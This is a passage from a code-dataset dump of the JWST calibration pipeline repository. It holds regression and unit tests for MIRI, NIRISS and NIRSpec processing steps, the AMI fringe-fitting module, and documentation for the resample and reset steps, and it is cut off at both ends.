output_truth='jw00001001001_01101_00001_MIRIMAGE_photom.fits',\n output_hdus=[],\n id='photom_miri'\n ),\n # test_photom_miri2: photom step performed on MIRI LRS slitless data\n dict(input='jw80600012001_02101_00003_mirimage_srctype.fits',\n test_dir='test_photom',\n step_class=PhotomStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_photom.fits',\n output_hdus=[],\n id='photom_miri2'\n ),\n # test_rscd_miri2: RSCD step performed on MIRI data\n dict(input='jw80600012001_02101_00003_mirimage_linearity.fits',\n test_dir='test_rscd',\n step_class=RSCD_Step,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_rscd.fits',\n output_hdus=[],\n id='rscd_miri'\n ),\n # test_saturation_miri: saturation step performed on uncalibrated MIRI data\n dict(input='jw00001001001_01101_00001_MIRIMAGE_dq_init.fits',\n test_dir='test_saturation',\n step_class=SaturationStep,\n step_pars=dict(),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_saturation.fits',\n output_hdus=['primary','sci','err','pixeldq','groupdq'],\n id='saturation_miri'\n ),\n # test_saturation_miri2: saturation step performed on uncalibrated MIRI data\n dict(input='jw80600012001_02101_00003_mirimage_dqinit.fits',\n test_dir='test_saturation',\n step_class=SaturationStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_saturation.fits',\n output_hdus=[],\n id='saturation_miri2'\n ),\n # test_srctype2: srctype step performed on MIRI LRS slitless data\n dict(input='jw80600012001_02101_00003_mirimage_flat_field.fits',\n test_dir='test_srctype',\n step_class=SourceTypeStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_srctype.fits',\n output_hdus=[],\n id='srctype_miri'\n ),\n # test_straylight1_miri: straylight performed on MIRI IFUSHORT data\n dict(input='jw80500018001_02101_00002_MIRIFUSHORT_flatfield.fits',\n test_dir='test_straylight',\n step_class=StraylightStep,\n step_pars=dict(),\n output_truth='jw80500018001_02101_00002_MIRIFUSHORT_straylight.fits',\n output_hdus=['primary','sci','err','dq'],\n id='straylight_miri'\n ),\n # test_straylight2_miri: straylight performed on MIRI IFULONG data\n dict(input='jw80500018001_02101_00002_MIRIFULONG_flatfield.fits',\n test_dir='test_straylight',\n step_class=StraylightStep,\n step_pars=dict(),\n output_truth='jw80500018001_02101_00002_MIRIFULONG_straylight.fits',\n output_hdus=[],\n id='straylight_miri2'\n ),\n ]\n }\n" }, { "alpha_fraction": 0.5092307925224304, "alphanum_fraction": 0.6084615588188171, "avg_line_length": 35.11111068725586, "blob_id": "0ae6d3888016f4f9d7ceea58abf2caaab79fc61b", "content_id": "e8a78c9886fd4b582cc870cc23e71081be34daff", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1300, "license_type": "permissive", "max_line_length": 82, "num_lines": 36, "path": "/jwst/tests_nightly/general/niriss/test_tso3.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom jwst.pipeline import Tso3Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\n\[email protected]\nclass TestTso3Pipeline(BaseJWSTTest):\n input_loc = 'niriss'\n ref_loc = ['test_caltso3', 'truth']\n test_dir = 'test_caltso3'\n\n def test_tso3_pipeline_nis(self):\n \"\"\"Regression test of calwebb_tso3 on NIRISS SOSS simulated data.\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n \"jw87600-a3001_20170527t111213_tso3_001_asn.json\")\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n Tso3Pipeline.call(asn_file)\n\n outputs = [\n # Compare level-2c product\n ('jw87600024001_02101_00001_nis_a3001_crfints.fits',\n 'jw87600-a3001_t1_niriss_clear-gr700xd_crfints_ref.fits',\n ['primary', 'sci', 'dq', 'err']),\n\n # Compare level-3 product\n ('jw87600-a3001_t1_niriss_clear-gr700xd_x1dints.fits',\n 'jw87600-a3001_t1_niriss_clear-gr700xd_x1dints_ref.fits',\n ['primary', 'extract1d']),\n ('jw87600-a3001_t1_niriss_clear-gr700xd_whtlt.ecsv',\n 'jw87600-a3001_t1_niriss_clear-gr700xd_whtlt_ref.ecsv'),\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.517241358757019, "alphanum_fraction": 0.5400679707527161, "avg_line_length": 35.76785659790039, "blob_id": "613ed22c4a819eadb40c1ed74bad817f36d658ac", "content_id": "5f7198e307c9f663f9282d92dfdacc2f27872775", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2059, "license_type": "permissive", "max_line_length": 65, "num_lines": 56, "path": "/jwst/tests_nightly/general/miri/test_mrs_spec3.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom jwst.pipeline.calwebb_spec3 import Spec3Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\n\[email protected]\nclass TestSpec3Pipeline(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['mrs_calspec3', 'truth']\n test_dir = 'mrs_calspec3'\n rtol = 0.000001\n\n def test_spec3_pipeline1(self):\n \"\"\"\n Regression test of calwebb_spec3 pipeline on simulated\n MIRI MRS dithered data.\n \"\"\"\n\n asn_file = self.get_data(self.test_dir, 'test_asn4.json')\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n step = Spec3Pipeline()\n step.save_bsub = False\n step.mrs_imatch.suffix = 'mrs_imatch'\n step.mrs_imatch.bkg_degree = 1\n step.mrs_imatch.subtract = False\n step.outlier_detection.skip = True\n step.output_use_model = True\n step.resample_spec.save_results = True\n step.resample_spec.suffix = 's2d'\n step.cube_build.save_results = True\n step.cube_build.suffix = 's3d'\n step.extract_1d.save_results = True\n step.extract_1d.suffix = 'x1d'\n step.run(asn_file)\n\n outputs = [(# Compare cube product 1\n 'det_image_ch1-short_s3d.fits',\n 'det_image_ch1-short_s3d_ref.fits',\n ['primary', 'sci', 'err', 'dq', 'wmap']),\n (# Compare cube product 2\n 'det_image_ch2-short_s3d.fits',\n 'det_image_ch2-short_s3d_ref.fits',\n ['primary', 'sci', 'err', 'dq', 'wmap']),\n (# Compare x1d product 1\n 'det_image_ch1-short_x1d.fits',\n 'det_image_ch1-short_x1d_ref.fits',\n ['primary', 'extract1d']),\n (# Compare x1d product 2\n 'det_image_ch2-short_x1d.fits',\n 'det_image_ch2-short_x1d_ref.fits',\n ['primary', 'extract1d'])\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.7299465537071228, "alphanum_fraction": 0.7379679083824158, "avg_line_length": 22.375, "blob_id": "a6fd43cb82b8d9a88332056d7447527a50e88168", "content_id": "83125e8be0cd9770259f3f7106f1b17713597aea", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 374, "license_type": "permissive", "max_line_length": 57, "num_lines": 16, "path": "/jwst/pipeline/tests/test_calwebspec2.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom ..calwebb_spec2 import Spec2Pipeline\n\n\[email protected](scope='module')\ndef fake_pipeline():\n return Spec2Pipeline()\n\n\ndef test_filenotfounderror_raised(fake_pipeline, capsys):\n with pytest.raises(RuntimeError):\n fake_pipeline.run('file_does_not_extis.fits')\n\n captured = capsys.readouterr()\n assert 'FileNotFoundError' in captured.err\n" }, { "alpha_fraction": 0.72775799036026, "alphanum_fraction": 0.7313167452812195, "avg_line_length": 35.25806427001953, "blob_id": "6f2185950e4434384dfd41a4bce06325a2fafd59", "content_id": "2007d773539c6efb01fb0b8e7df8b6d8c9e546d8", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1124, "license_type": "permissive", "max_line_length": 73, "num_lines": 31, "path": "/docs/jwst/resample/arguments.rst", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": ".. _resample_step_args:\n\nStep Arguments\n==============\nThe `resample` step has the following optional arguments that control\nthe behavior of the processing and the characteristics of the resampled\nimage.\n\n``--pixfrac`` (float, default=1.0)\n The fraction by which input pixels are \"shrunk\" before being drizzled\n onto the output image grid, given as a real number between 0 and 1.\n\n``--kernel`` (str, default='square')\n The form of the kernel function used to distribute flux onto the output\n image.\n\n``--fillval`` (str, default='INDEF')\n The value to assign to output pixels that have zero weight or do not\n receive any flux from any input pixels during drizzling.\n\n``--weight_type`` (str, default='exptime')\n The weighting factor for each input image. If `weight_type=exptime`,\n the scaling value will be set equal to the exposure time found in\n the image header.\n\n``--single`` (bool, default=False)\n Resample each input image into a separate output.\n\n``--blendheaders`` (bool, default=True)\n Apply `blendmodels` on all of the input images to combine ('blend')\n their meta data into the output resampled image.\n" }, { "alpha_fraction": 0.6449480652809143, "alphanum_fraction": 0.6635977625846863, "avg_line_length": 32.88800048828125, "blob_id": "569c894fb000cc351de4b6dde905d3339e7bd5e5", "content_id": "4ed5cee95a32ddcadaf36a49b29de730f4113449", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4236, "license_type": "permissive", "max_line_length": 89, "num_lines": 125, "path": "/jwst/ami/ami_analyze.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "#\n# Module for applying the LG algorithm to an AMI exposure\n#\n\nimport logging\nimport warnings\nimport numpy as np\nfrom .. import datamodels\n\nfrom .nrm_model import NrmModel\nfrom . import webb_psf\nfrom . import leastsqnrm\nfrom . import utils\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\ndef apply_LG(input_model, filter_model, oversample, rotation):\n \"\"\"\n Short Summary\n -------------\n Applies the LG fringe detection algorithm to an AMI image\n\n Parameters\n ----------\n input_model: data model object\n AMI science image to be analyzed\n\n filter_model: filter model object\n filter throughput reference data\n\n oversample: integer\n Oversampling factor\n\n rotation: float (degrees)\n Initial guess at rotation of science image relative to model\n\n Returns\n -------\n output_model: Fringe model object\n Fringe analysis data\n \"\"\"\n # Supress harmless arithmetic warnings for now\n warnings.filterwarnings(\"ignore\", \".*invalid value.*\", RuntimeWarning)\n warnings.filterwarnings(\"ignore\", \".*divide by zero.*\", RuntimeWarning)\n\n # Report the FILTER value for this image\n log.info('Filter: %s', input_model.meta.instrument.filter)\n\n # Load the filter throughput data from the reference file\n bindown = 12\n band = webb_psf.get_webbpsf_filter(filter_model, specbin=bindown)\n\n # Set up some params that are needed as input to the LG algorithm:\n # Search window for rotation fine-tuning\n rots_deg = np.array((-1.00, -0.5, 0.0, 0.5, 1.00))\n\n # Search range for relative pixel scales\n relpixscales = np.array((64.2, 64.4, 64.6, 64.8, 65.0, 65.2, 65.4, 65.6, 65.8)) /65.0\n\n # Convert initial rotation guess from degrees to radians\n rotation = rotation * np.pi / 180.0\n\n # Instantiate the NRM model object\n jwnrm = NrmModel(mask='jwst', holeshape='hex',\n pixscale=leastsqnrm.mas2rad(65.),\n rotate=rotation, rotlist_deg=rots_deg,\n scallist=relpixscales)\n\n # Load the filter bandpass data into the NRM model\n jwnrm.bandpass = band\n # Set the oversampling factor in the NRM model\n jwnrm.over = oversample\n\n # Now fit the data in the science exposure\n # (pixguess is a guess at the pixel scale of the data)\n # produces a 19x19 image of the fit\n input_data = input_model.data.astype(np.float64)\n input_dq = input_model.dq\n\n datamodel_img_model = datamodels.ImageModel(data=input_data, dq=input_dq)\n box_size = 4\n\n new_img_model = utils.img_median_replace(datamodel_img_model, box_size)\n\n input_data = new_img_model.data.copy()\n input_model.data = input_data.astype(np.float64)\n\n del datamodel_img_model, new_img_model\n\n subarray = input_model.meta.subarray.name.upper()\n if subarray == 'FULL':\n # Instead of using the FULL subarray, extract the same region (size and\n # location) as used by SUB80 to make execution time acceptable\n xstart = 1045 # / Starting pixel in axis 1 direction\n ystart = 1 # / Starting pixel in axis 2 direction\n xsize = 80 # / Number of pixels in axis 1 direction\n ysize = 80 # / Number of pixels in axis 2 direction\n xstop = xstart + xsize - 1\n ystop = ystart + ysize - 1\n\n jwnrm.fit_image(input_data[ystart-1:ystop, xstart-1:xstop], pixguess=jwnrm.pixel)\n else:\n jwnrm.fit_image(input_data, pixguess=jwnrm.pixel)\n\n # Construct model image from fitted PSF\n jwnrm.create_modelpsf()\n\n # Reset the warnings filter to its original state\n warnings.resetwarnings()\n\n # Store fit results in output model\n output_model = datamodels.AmiLgModel(fit_image=jwnrm.modelpsf,\n resid_image=jwnrm.residual,\n closure_amp_table=np.asarray(jwnrm.redundant_cas),\n closure_phase_table=np.asarray(jwnrm.redundant_cps),\n fringe_amp_table=np.asarray(jwnrm.fringeamp),\n fringe_phase_table=np.asarray(jwnrm.fringephase),\n pupil_phase_table=np.asarray(jwnrm.piston),\n solns_table=np.asarray(jwnrm.soln))\n\n # Copy header keywords from input to output\n output_model.update(input_model)\n\n return output_model\n" }, { "alpha_fraction": 0.5778816342353821, "alphanum_fraction": 0.59112149477005, "avg_line_length": 27.53333282470703, "blob_id": "42ad9d1559713b78b5388ffd2839c684e3d0433f", "content_id": "f4dbb6db7befd99b80a8327894275e9392d1f759", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1284, "license_type": "permissive", "max_line_length": 69, "num_lines": 45, "path": "/jwst/tests_nightly/general/nirspec/test_nirspec_msa_spec3.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Test calwebb_spec3 against NIRSpec MOS science (MSA)\"\"\"\nfrom pathlib import Path\nimport pytest\n\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\n\[email protected]\nclass TestSpec3Pipeline(BaseJWSTTest):\n \"\"\"Tests for Spec3Pipeline\"\"\"\n\n input_loc = 'nirspec'\n ref_loc = ['test_datasets', 'msa', 'sdp_jw95175', 'truth']\n test_dir = ['test_datasets', 'msa', 'sdp_jw95175']\n\n def test_nrs_msa_spec3(self):\n \"\"\"\n Regression test of calwebb_spec3 pipeline performed on\n NIRSpec MSA data\n \"\"\"\n cfg_dir = './cfgs'\n collect_pipeline_cfgs(cfg_dir)\n asn_file = self.get_data(*self.test_dir,\n 'single_asn.json')\n\n for file in raw_from_asn(asn_file):\n self.get_data(*self.test_dir, file)\n\n args = [\n str(Path(cfg_dir) / 'calwebb_spec3.cfg'),\n asn_file\n ]\n\n Step.from_cmdline(args)\n\n # Compare results\n truths = self.data_glob(*self.ref_loc, glob='*.fits')\n outputs = [\n (Path(output_file).name, ) * 2\n for output_file in truths\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5208883285522461, "alphanum_fraction": 0.6035619974136353, "avg_line_length": 38.894737243652344, "blob_id": "d129fec2ef2e705a75f72606336f44979fe47723", "content_id": "67d26777c75cc98ed272643197b5a377b3cefb17", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4548, "license_type": "permissive", "max_line_length": 88, "num_lines": 114, "path": "/jwst/tests_nightly/general/nirspec/test_pipelines.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\nfrom jwst.pipeline import DarkPipeline\nfrom jwst.pipeline import Spec2Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestNIRSpecPipelines(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_pipelines', 'truth']\n test_dir = 'test_pipelines'\n\n def test_nirspec_dark_pipeline(self):\n \"\"\"\n Regression test of calwebb_dark pipeline performed on NIRSpec raw data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw84500013001_02103_00003_NRS1_uncal.fits')\n\n pipe = DarkPipeline()\n pipe.suffix = 'dark'\n pipe.ipc.skip = True\n pipe.refpix.odd_even_columns = True\n pipe.refpix.use_side_ref_pixels = True\n pipe.refpix.side_smoothing_length = 11\n pipe.refpix.side_gain = 1.0\n pipe.refpix.odd_even_rows = True\n pipe.output_file = 'jw84500013001_02103_00003_NRS1_uncal.fits'\n\n pipe.run(input_file)\n\n outputs = [('jw84500013001_02103_00003_NRS1_dark.fits',\n 'jw84500013001_02103_00003_NRS1_dark_ref.fits',\n ['primary','sci','err','pixeldq','groupdq'])]\n self.compare_outputs(outputs)\n\n def test_nrs_fs_brightobj_spec2(self):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on NIRSpec\n fixed-slit data that uses the NRS_BRIGHTOBJ mode (S1600A1 slit).\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw84600042001_02101_00001_nrs2_rateints.fits')\n collect_pipeline_cfgs()\n args = [\n 'calwebb_tso-spec2.cfg',\n input_file\n ]\n Step.from_cmdline(args)\n\n outputs = [('jw84600042001_02101_00001_nrs2_calints.fits',\n 'jw84600042001_02101_00001_nrs2_calints_ref.fits'),\n ('jw84600042001_02101_00001_nrs2_x1dints.fits',\n 'jw84600042001_02101_00001_nrs2_x1dints_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n def test_nrs_msa_spec2(self):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on NIRSpec MSA data.\n \"\"\"\n input = 'f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod.fits'\n input_file = self.get_data(self.test_dir, input)\n self.get_data(self.test_dir, 'jw95065006001_0_short_msa.fits')\n\n # define step for use in test\n step = Spec2Pipeline()\n step.save_results = True\n step.save_bsub = False\n step.output_use_model = True\n step.resample_spec.save_results = True\n step.extract_1d.save_results = True\n step.extract_1d.smoothing_length = 0\n step.extract_1d.bkg_order = 0\n step.run(input_file)\n\n outputs = [('f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_cal.fits',\n 'f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_cal_ref.fits'),\n ('f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_s2d.fits',\n 'f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_s2d_ref.fits'),\n ('f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_x1d.fits',\n 'f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_x1d_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n def test_nrs_msa_spec2b(self):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on NIRSpec MSA data,\n including barshadow correction.\n \"\"\"\n input = 'jw95065_nrs_msaspec_barshadow.fits'\n input_file = self.get_data(self.test_dir, input)\n self.get_data(self.test_dir, 'jwst_nirspec_shutters_barshadow.fits')\n\n step = Spec2Pipeline()\n step.output_file='jw95065_nrs_msaspec_barshadow_cal.fits'\n step.save_bsub = False\n step.save_results = True\n step.resample_spec.save_results = True\n step.extract_1d.save_results = True\n step.run(input_file)\n\n outputs = [('jw95065_nrs_msaspec_barshadow_cal.fits',\n 'jw95065_nrs_msaspec_barshadow_cal_ref.fits'),\n ('jw95065_nrs_msaspec_barshadow_s2d.fits',\n 'jw95065_nrs_msaspec_barshadow_s2d_ref.fits'),\n ('jw95065_nrs_msaspec_barshadow_x1d.fits',\n 'jw95065_nrs_msaspec_barshadow_x1d_ref.fits')\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.6221492290496826, "alphanum_fraction": 0.6387520432472229, "avg_line_length": 24.73239517211914, "blob_id": "79c0f336d9a7554096485b7ec6e8cc5c44aa85f1", "content_id": "78f32b308ccbb7ff2877630842202b480f974342", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5481, "license_type": "permissive", "max_line_length": 62, "num_lines": 213, "path": "/jwst/associations/tests/test_constraints.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Constraint Tests\"\"\"\nimport pytest\n\nfrom ..lib.constraint import (\n Constraint,\n SimpleConstraint,\n SimpleConstraintABC,\n)\n\n\ndef test_simpleconstraint_reprocess_match():\n \"\"\"Test options for reprocessing\"\"\"\n sc = SimpleConstraint(\n value='my_value',\n reprocess_on_match=True\n )\n match, reprocess = sc.check_and_set('my_value')\n assert match\n assert len(reprocess)\n\n\ndef test_simpleconstraint_reprocess_nomatch():\n \"\"\"Test options for reprocessing\"\"\"\n sc = SimpleConstraint(\n value='my_value',\n reprocess_on_fail=True\n )\n match, reprocess = sc.check_and_set('bad_value')\n assert not match\n assert len(reprocess)\n\n\ndef test_constraint_reprocess_match():\n \"\"\"Test options for reprocessing\"\"\"\n sc = SimpleConstraint(value='my_value')\n c = Constraint([sc], reprocess_on_match=True)\n match, reprocess = c.check_and_set('my_value')\n assert match\n assert len(reprocess)\n\n\ndef test_constraint_reprocess_nomatch():\n \"\"\"Test options for reprocessing\"\"\"\n sc = SimpleConstraint(value='my_value')\n c = Constraint([sc], reprocess_on_fail=True)\n match, reprocess = c.check_and_set('bad_value')\n assert not match\n assert len(reprocess)\n\n\ndef test_abc():\n \"\"\"Test ABC istelf\"\"\"\n with pytest.raises(TypeError):\n SimpleConstraintABC()\n\n\ndef test_simpleconstraint():\n \"\"\"Test initialization\"\"\"\n\n # Basic initialization\n c = SimpleConstraint()\n assert c.value is None\n assert c.force_unique\n assert c.test == c.eq\n\n # Parameter initialization\n c = SimpleConstraint(value='my_value')\n assert c.value == 'my_value'\n\n # Dict initialization\n c = SimpleConstraint({'value': 'my_value'})\n assert c.value == 'my_value'\n\n\ndef test_simpleconstraint_checkset():\n \"\"\"Test check_and_set\"\"\"\n\n # Check and set.\n c = SimpleConstraint()\n match, reprocess = c.check_and_set('my_value')\n assert match\n assert c.value == 'my_value'\n assert len(reprocess) == 0\n\n # Non-match\n c = SimpleConstraint(value='my_value')\n match, reprocess = c.check_and_set('bad_value')\n assert not match\n assert c.value == 'my_value'\n assert len(reprocess) == 0\n\n # Don't force unique\n c = SimpleConstraint(force_unique=False)\n match, reprocess = c.check_and_set('my_value')\n assert match\n assert c.value is None\n assert len(reprocess) == 0\n\n\ndef test_constraint_default():\n \"\"\"Test constraint operations\"\"\"\n\n sc1 = SimpleConstraint()\n sc2 = SimpleConstraint()\n c = Constraint([sc1, sc2])\n match, reprocess = c.check_and_set('my_value')\n assert match\n for constraint in c.constraints:\n assert constraint.value == 'my_value'\n\n\ndef test_invalid_init():\n with pytest.raises(TypeError):\n Constraint('bad init')\n\n\ndef test_constraint_all():\n \"\"\"Test the all operation\"\"\"\n\n sc1 = SimpleConstraint(value='value_1')\n sc2 = SimpleConstraint(value='value_2')\n c = Constraint([sc1, sc2])\n match, reprocess = c.check_and_set('value_1')\n assert not match\n\n\ndef test_constraint_any_basic():\n \"\"\"Test the all operation\"\"\"\n\n sc1 = SimpleConstraint(value='value_1')\n sc2 = SimpleConstraint(value='value_2')\n c = Constraint([sc1, sc2], reduce=Constraint.any)\n match, reprocess = c.check_and_set('value_1')\n assert match\n match, reprocess = c.check_and_set('value_2')\n assert match\n match, reprocess = c.check_and_set('value_3')\n assert not match\n\n\ndef test_constraint_any_remember():\n \"\"\"Ensure that any doesn't forget other or propositions\"\"\"\n\n sc1 = SimpleConstraint(value='value_1')\n sc2 = SimpleConstraint(value='value_2')\n c = Constraint([sc1, sc2], reduce=Constraint.any)\n match, reprocess = c.check_and_set('value_1')\n assert match\n match, reprocess = c.check_and_set('value_2')\n assert match\n match, reprocess = c.check_and_set('value_1')\n assert match\n match, reprocess = c.check_and_set('value_3')\n assert not match\n\n\ndef test_iteration():\n \"\"\"Test various iterations\"\"\"\n sc = SimpleConstraint()\n for idx in sc:\n assert isinstance(idx, SimpleConstraint)\n\n c = Constraint([sc, sc])\n count = 0\n for idx in c:\n assert isinstance(idx, SimpleConstraint)\n count += 1\n assert count == 2\n\n c = Constraint([\n Constraint([sc, sc]),\n Constraint([sc, sc])\n ])\n count = 0\n for idx in c:\n assert isinstance(idx, SimpleConstraint)\n count += 1\n assert count == 4 # Not 6\n\n\ndef test_name_index():\n \"\"\"Test for name indexing\"\"\"\n sc1 = SimpleConstraint(name='sc1', value='value1')\n sc2 = SimpleConstraint(name='sc2', value='value2')\n c1 = Constraint([sc1, sc2])\n assert c1['sc1'].value\n assert c1['sc2'].value\n\n sc3 = SimpleConstraint(name='sc3', value='value3')\n sc4 = SimpleConstraint(name='sc4', value='value4')\n c2 = Constraint([sc3, sc4, c1])\n assert c2['sc1'].value\n assert c2['sc2'].value\n assert c2['sc3'].value\n assert c2['sc4'].value\n\n with pytest.raises(KeyError):\n c2['nonexistant'].value\n\n with pytest.raises(AttributeError):\n c2['sc1'].nonexistant\n\n\ndef test_copy():\n sc1 = SimpleConstraint(name='sc1')\n sc1_copy = sc1.copy()\n assert id(sc1) != id(sc1_copy)\n sc1.check_and_set('value1')\n assert sc1.value == 'value1'\n assert sc1_copy.value is None\n sc1_copy.check_and_set('value2')\n assert sc1_copy.value == 'value2'\n assert sc1.value == 'value1'\n" }, { "alpha_fraction": 0.7946699261665344, "alphanum_fraction": 0.7970926761627197, "avg_line_length": 44.23287582397461, "blob_id": "3ac17ae307d51405eded4b14a60c4ef2a71e6b6d", "content_id": "9ed5e3cd95c54052ae206f19c927532689042cfa", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3302, "license_type": "permissive", "max_line_length": 79, "num_lines": 73, "path": "/docs/jwst/reset/description.rst", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "Description\n===========\n\n.. note:: The reset step is not currently applied to MIRI exposures, but\n will likely be reinstated in a future build.\n\nAssumptions\n-----------\nThe reset correction is a MIRI-specific correction. It is\nassumed that the input science data have *NOT* had the zero group (or bias)\nsubtracted. The reset correction should not remove the\nbias signal from the science exposure, therefore the reset correction\nfor the first group is defined to be zero.\n\nBackground\n__________\n\nFor MIRI exposures, the initial groups in each integration suffer from two\neffects related to the resetting of the detectors. The first effect is that the\nfirst few groups after a reset do not fall\non the expected linear accumulation of signal.\nThe most significant deviations ocurr in groups 1 and 2.\nThis behavior is relatively uniform detector-wide. The second effect,\non the other hand, is the appearance of\nsignificant extra spatial structure in these initial\ngroups, before fading out in later groups.\n\nThe time constant associated with the reset anomaly is\nroughly a minute so for full array data the effect has faded out\nby ~group 20. On subarray data, where the read time depends on\nthe size of the subarray, the reset anomaly affects more\ngroups in an integration.\n\nFor multiple integration data, the reset anomaly also varies in amplitude\nfor the first set of integrations before settling down to a relatively\nconstant correction for integrations greater than four for full array\ndata. Because of the shorter readout time, the subarray data requires a few\nmore integrations before the effect is relatively stable from integration\nto integration.\n\nAlgorithm\n_________\nThe reset correction step applies the reset reference file.\nThe reset reference file contains an integration dependent\ncorrection for the first N groups, where N is defined by the reset\ncorrection reference file.\n\nThe format of the reset reference file is NCols X NRows X NGroups X NInts.\nThe current implementation uses a reset anomaly reference file for\nfull array data containing a correction for the first 30 groups for\nintegrations 1-4. The reference file\nwas determined so that the correction is forced to be zero on the last\ngroup for each integration. For each integration in the input science data,\nthe reset corrections are subtracted, group-by-group, integration-by-\nintegration. If the input science data contains more groups than the\nreset correction, then correction for those groups is zero. If the\ninput science data contains more integrations than the reset correction\nthen the correction corresponding to the last intergration in the reset file\nis used.\n\nThere is a single, NCols X NRowss, DQ flag image for all the integrations.\nThe reset DQ flag array are combined with the science PIXELDQ array using\nnumpy's bitwise_or function. The ERR arrays of the science data are\ncurrently not modified at all.\n\nSubarrays\n----------\n\nThe reset correction is subarray-dependent, therefore this\nstep makes no attempt to extract subarrays from the reset reference file to\nmatch input subarrays. It instead relies on the presence of matching subarray\nreset reference files in the CRDS. In addition, the number of NGROUPS and NINTS\nfor subarray data varies from the full array data as well as from each other.\n" }, { "alpha_fraction": 0.6416075825691223, "alphanum_fraction": 0.6704491972923279, "avg_line_length": 36.76785659790039, "blob_id": "da54ff176c9d6a165c1f803d846dc6d1f22e8201", "content_id": "75ff7e7d8425d68cd8156f9f45e6780f3de23b02", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2115, "license_type": "permissive", "max_line_length": 109, "num_lines": 56, "path": "/jwst/regtest/test_nirspec_mos_spec2.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import os\nimport pytest\nfrom astropy.io.fits.diff import FITSDiff\n\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\[email protected](scope=\"module\")\ndef run_pipeline(jail, rtdata_module):\n \"\"\"Run the calwebb_spec2 pipeline on a single NIRSpec MOS exposure.\"\"\"\n\n rtdata = rtdata_module\n\n # Get the cfg files\n collect_pipeline_cfgs(\"config\")\n\n # Get the MSA metadata file referenced in the input exposure\n rtdata.get_data(\"nirspec/mos/jw95065006001_0_short_msa.fits\")\n\n # Get the input exposure\n rtdata.get_data(\"nirspec/mos/f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod.fits\")\n\n # Run the calwebb_spec2 pipeline; save results from intermediate steps\n args = [\"config/calwebb_spec2.cfg\", rtdata.input,\n \"--steps.assign_wcs.save_results=true\",\n \"--steps.msa_flagging.save_results=true\",\n \"--steps.extract_2d.save_results=true\",\n \"--steps.srctype.save_results=true\",\n \"--steps.wavecorr.save_results=true\",\n \"--steps.flat_field.save_results=true\",\n \"--steps.pathloss.save_results=true\",\n \"--steps.barshadow.save_results=true\"]\n Step.from_cmdline(args)\n\n return rtdata\n\n\[email protected]\[email protected](\"output\",[\n \"assign_wcs\", 